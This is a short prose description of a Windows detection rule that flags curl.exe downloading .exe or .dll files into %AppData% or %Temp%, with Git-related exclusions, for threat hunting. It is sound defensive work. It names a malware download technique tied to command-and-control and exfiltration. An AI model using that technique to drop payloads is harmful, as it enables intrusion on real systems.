This detection rule identifies suspicious executions of the curl.exe utility on Windows systems, particularly when the process involves downloading files to potentially insecure directories. The detection is based on several conditions that analyze the properties of the process launch, such as the command line arguments and image names. It specifically looks for occurrences of curl.exe being executed and additionally checks for certain suspicious file paths typically associated with malware activities. The rule will trigger if curl.exe is detected in conjunction with command line parameters that indicate file downloading to directories such as %AppData%, %Temp%, or similar locations, particularly if the file extensions suggest they may contain malicious content (e.g., .exe, .dll). Careful filtering is implemented to minimize false positives by excluding known legitimate use cases, such as those associated with Git installations. This makes it a vital asset for threat hunters and incident responders, helping to reveal potential command-and-control (C2) activities or data exfiltration tactics used by attackers.